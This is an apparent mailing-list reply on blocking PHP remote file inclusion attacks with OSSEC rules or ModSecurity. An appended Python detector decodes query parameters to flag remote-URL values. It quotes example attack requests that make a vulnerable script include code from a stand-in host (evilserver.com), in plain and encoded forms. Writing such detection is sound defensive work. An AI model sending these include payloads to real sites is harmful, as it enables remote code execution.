[EMAIL PROTECTED] wrote:
> In web_rules.xml (add around line 46):
> <url>%3A|%2F|:|/</url>
> to block, as an XSS attack or SQL attack log type:
> http://mywebsite.com/vulnerable_script.php?include=http://evilserver.com/evil_script.txt
> http://mywebsite.com/vulnerable_script.php?include=http%3a%2f%2fevilserver.com%2fevil_script.txt
> (to block many script kiddies from:
> http://www.milw0rm.com/search.php?dong=include )
For that kind of problem (obfuscation), might I suggest Mod_Security
(http://www.modsecurity.org/)?
Mod_Security is a module for Apache to filter that kind of attack; it
automatically translates obfuscation so there are fewer filters to work out.
%3a and %2f are not always bad (some Lotus Domino web servers add them,
as well as CGI proxies).
It will be a pain in the ass to filter any combination of encoding.
And in my opinion, if you use ossec to filter, you are too late...
With mod_security, the attack doesn't even reach the web server.
Just my two cents...
Sioban
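
Added example (not part of the original thread, and not OSSEC or ModSecurity code): a decode-then-match check for the two request forms quoted above, which normalizes each query parameter before testing whether its value is a remote URL, so that a bare %2F or %3A is not flagged on its own. It goes one step beyond the thread by also unwrapping double encoding; the function names, the decode bound and the sample requests are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# A parameter value that is itself a remote URL once decoded.
REMOTE_URL = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)
MAX_DECODE_ROUNDS = 3  # assumption: bound on nested percent-encoding layers

def fully_decode(value, rounds=MAX_DECODE_ROUNDS):
    """Percent-decode until the value stops changing (covers %253a-style layers)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def remote_include_params(request_url):
    """Return [(name, decoded_value)] for query parameters holding a remote URL."""
    hits = []
    # parse_qsl removes one encoding layer; fully_decode removes any others.
    for name, value in parse_qsl(urlsplit(request_url).query, keep_blank_values=True):
        decoded = fully_decode(value)
        if REMOTE_URL.match(decoded):
            hits.append((name, decoded))
    return hits

# Constructed sample requests: the first two are the URLs quoted in the thread,
# the third is a double-encoded variant, the last is benign use of %2F and %3A.
SAMPLE_REQUESTS = [
    "http://mywebsite.com/vulnerable_script.php?include=http://evilserver.com/evil_script.txt",
    "http://mywebsite.com/vulnerable_script.php?include=http%3a%2f%2fevilserver.com%2fevil_script.txt",
    "http://mywebsite.com/vulnerable_script.php?include=http%253a%252f%252fevilserver.com%252fevil_script.txt",
    "http://mywebsite.com/page.php?path=docs%2Fmanual%3Av2",
]

def scan(requests):
    """Map each flagged request to the parameters that triggered the match."""
    results = {r: remote_include_params(r) for r in requests}
    return {r: hits for r, hits in results.items() if hits}

if __name__ == "__main__":
    for request, params in scan(SAMPLE_REQUESTS).items():
        print("ALERT", request, params)
```

Parameters that legitimately carry URLs (redirect targets, for example) would also match, so a deployment would pair this check with a per-parameter allow-list.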